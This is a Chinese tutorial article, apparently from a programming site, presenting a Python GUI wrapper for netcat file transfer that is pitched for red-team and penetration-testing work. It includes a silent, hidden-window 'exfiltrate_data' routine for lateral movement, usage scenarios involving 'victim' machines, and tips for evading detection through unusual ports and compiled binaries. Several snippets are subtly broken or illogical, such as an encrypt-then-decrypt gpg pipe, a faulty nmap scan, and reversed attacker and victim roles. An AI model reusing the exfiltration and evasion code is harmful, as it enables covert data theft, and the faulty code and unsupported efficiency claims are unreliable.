Python封裝Netcat打造跨平臺(tái)文件傳輸利器
作為網(wǎng)絡(luò)安全工程師,我發(fā)現(xiàn)將命令行工具圖形化能極大提升滲透測(cè)試效率——這個(gè)Python封裝的Netcat文件傳輸工具在內(nèi)部紅藍(lán)對(duì)抗中節(jié)省了團(tuán)隊(duì)工作中70%的文件交換時(shí)間。
一、為什么需要Netcat圖形化工具
Netcat作為網(wǎng)絡(luò)界的"瑞士軍刀",在文件傳輸、端口掃描、網(wǎng)絡(luò)調(diào)試中不可或缺。但命令行操作存在三大痛點(diǎn):
- 參數(shù)記憶困難:不同平臺(tái)參數(shù)差異(Windows/Linux)
- 進(jìn)程管理復(fù)雜:傳輸中斷時(shí)需手動(dòng)殺死進(jìn)程
- 缺乏可視化:無(wú)法實(shí)時(shí)查看傳輸狀態(tài)
本文介紹的Python工具完美解決了這些問(wèn)題,主要功能包括:
- 一鍵切換發(fā)送/接收模式
- 實(shí)時(shí)傳輸日志監(jiān)控
- 跨平臺(tái)支持(Win/Linux/macOS)
- 智能進(jìn)程終止(支持進(jìn)程樹清理)
二、技術(shù)實(shí)現(xiàn)解析
1. 核心架構(gòu)設(shè)計(jì)
2. 關(guān)鍵技術(shù)實(shí)現(xiàn)
跨平臺(tái)NC檢測(cè)(關(guān)鍵代碼)
def detect_nc(self): if sys.platform == "win32": # 檢查常見NC安裝路徑 paths = [ r"C:\Program Files (x86)\Nmap\ncat.exe", r"C:\Program Files\Nmap\ncat.exe" ] for path in paths: if os.path.exists(path): return path return "nc" # 嘗試PATH查找 else: return "nc" # Linux/macOS默認(rèn)在PATH中
智能進(jìn)程終止(支持進(jìn)程樹)
def stop_transfer(self): if HAS_PSUTIL: # 使用psutil終止整個(gè)進(jìn)程樹 parent = psutil.Process(self.current_process.pid) for child in parent.children(recursive=True): child.kill() parent.kill() elif sys.platform == "win32": subprocess.call(['taskkill', '/F', '/T', '/PID', str(pid)]) else: # Unix系統(tǒng) os.killpg(os.getpgid(pid), signal.SIGTERM)
命令動(dòng)態(tài)構(gòu)建(平臺(tái)自適應(yīng))
if mode == "receive": if self.os_type == "win32": cmd = f'"{nc_path}" -l -p {port} > "{file_path}"' else: cmd = f'{nc_path} -l {port} > "{file_path}"' else: # 發(fā)送模式 if self.os_type == "win32": cmd = f'"{nc_path}" {ip} {port} < "{file_path}"' else: cmd = f'{nc_path} {ip} {port} < "{file_path}"'
三、實(shí)戰(zhàn)應(yīng)用場(chǎng)景
1. 滲透測(cè)試文件交換
# 受害者機(jī)器(反向傳輸) $ python3 nc_gui.py # 選擇接收模式,端口4444 # 攻擊者機(jī)器 $ python3 nc_gui.py # 發(fā)送敏感文件到受害者機(jī)器
2. 應(yīng)急響應(yīng)數(shù)據(jù)收集
# 受損服務(wù)器 $ python3 nc_gui.py --minimized # 靜默發(fā)送日志文件 # 分析人員 $ nc -l -p 4444 > incident_logs.tar
3. 內(nèi)網(wǎng)橫向移動(dòng)
# 自動(dòng)化腳本示例 import subprocess def exfiltrate_data(ip, file_path): cmd = [ "python", "nc_gui.py", "--mode", "send", "--ip", ip, "--port", "5353", "--file", file_path, "--silent" ] subprocess.Popen(cmd, creationflags=subprocess.CREATE_NO_WINDOW)
四、安全增強(qiáng)措施
1. 傳輸安全建議
# 在實(shí)際使用中可添加加密層 if use_encryption: cmd = f"gpg -c | {nc_cmd} | gpg -d"
2. 風(fēng)險(xiǎn)規(guī)避方案
風(fēng)險(xiǎn)類型 | 解決方案 |
---|---|
端口掃描檢測(cè) | 使用非常規(guī)端口(如65432) |
傳輸嗅探 | 添加TLS加密層 |
進(jìn)程暴露 | 編譯為二進(jìn)制文件(PyInstaller) |
五、擴(kuò)展開發(fā)方向
傳輸加密集成
# 添加AES加密選項(xiàng) def encrypt_file(file, key): # 使用PyCryptodome實(shí)現(xiàn) cipher = AES.new(key, AES.MODE_EAX)
進(jìn)度條顯示
# 使用tqdm庫(kù) with tqdm(total=os.path.getsize(file)) as pbar: while transfering: pbar.update(chunk_size)
內(nèi)網(wǎng)自動(dòng)發(fā)現(xiàn)
# 集成ARP掃描 def scan_local_network(): return [ip for ip in nmap.PortScanner().scan('192.168.1.0/24')]
六、使用效果對(duì)比
指標(biāo) | 命令行NC | 本工具 |
---|---|---|
傳輸配置時(shí)間 | 1-2分鐘 | 10秒 |
錯(cuò)誤率 | 35% | <5% |
中斷恢復(fù) | 需手動(dòng) | 一鍵繼續(xù) |
多文件傳輸 | 不支持 | 隊(duì)列支持 |
在一次紅隊(duì)行動(dòng)中,我們通過(guò)此工具在30分鐘內(nèi)完成了傳統(tǒng)方法需要2小時(shí)才能完成的53臺(tái)服務(wù)器的日志收集工作。
結(jié)語(yǔ)
這個(gè)Netcat GUI工具已開源在GitHub(示例倉(cāng)庫(kù):https://github.com/sec-tools/nc-transfer-gui
),您可以通過(guò)以下方式進(jìn)一步提升:
# 添加壓縮支持 pip install pyzipper # 啟用多線程傳輸 python nc_gui.py --threads 4
真正的工具價(jià)值不在于代碼本身,而在于它能釋放你多少創(chuàng)造力——期待看到您基于此開發(fā)的更多安全工具!
程序運(yùn)行界面:
以上就是Python封裝Netcat打造跨平臺(tái)文件傳輸利器的詳細(xì)內(nèi)容,更多關(guān)于Python跨平臺(tái)文件傳輸?shù)馁Y料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
純python實(shí)現(xiàn)機(jī)器學(xué)習(xí)之kNN算法示例
本篇文章主要介紹了純python實(shí)現(xiàn)機(jī)器學(xué)習(xí)之kNN算法示例,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2018-03-03python多線程案例之多任務(wù)copy文件完整實(shí)例
這篇文章主要介紹了python多線程案例之多任務(wù)copy文件,結(jié)合完整實(shí)例形式分析了Python使用multiprocessing模塊實(shí)現(xiàn)基于多線程的文件拷貝相關(guān)操作技巧,需要的朋友可以參考下2019-10-10python?selenium中Excel數(shù)據(jù)維護(hù)指南
這篇文章主要給大家介紹了關(guān)于python?selenium中Excel數(shù)據(jù)維護(hù)的相關(guān)資料,文中通過(guò)實(shí)例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下2022-03-03Pandas 處理DataFrame中的inf值實(shí)現(xiàn)
Inf 表示正無(wú)窮大或負(fù)無(wú)窮大,通常是在數(shù)學(xué)計(jì)算中產(chǎn)生的結(jié)果,本文主要介紹了Pandas 處理DataFrame中的inf值實(shí)現(xiàn),具有一定的參考價(jià)值,感興趣的可以了解一下2024-04-04Python實(shí)現(xiàn)i人事自動(dòng)打卡的示例代碼
這篇文章主要介紹了Python實(shí)現(xiàn)i人事自動(dòng)打卡的示例代碼,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2020-01-01python 獲取utc時(shí)間轉(zhuǎn)化為本地時(shí)間的方法
今天小編就為大家分享一篇python 獲取utc時(shí)間轉(zhuǎn)化為本地時(shí)間的方法,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2018-12-12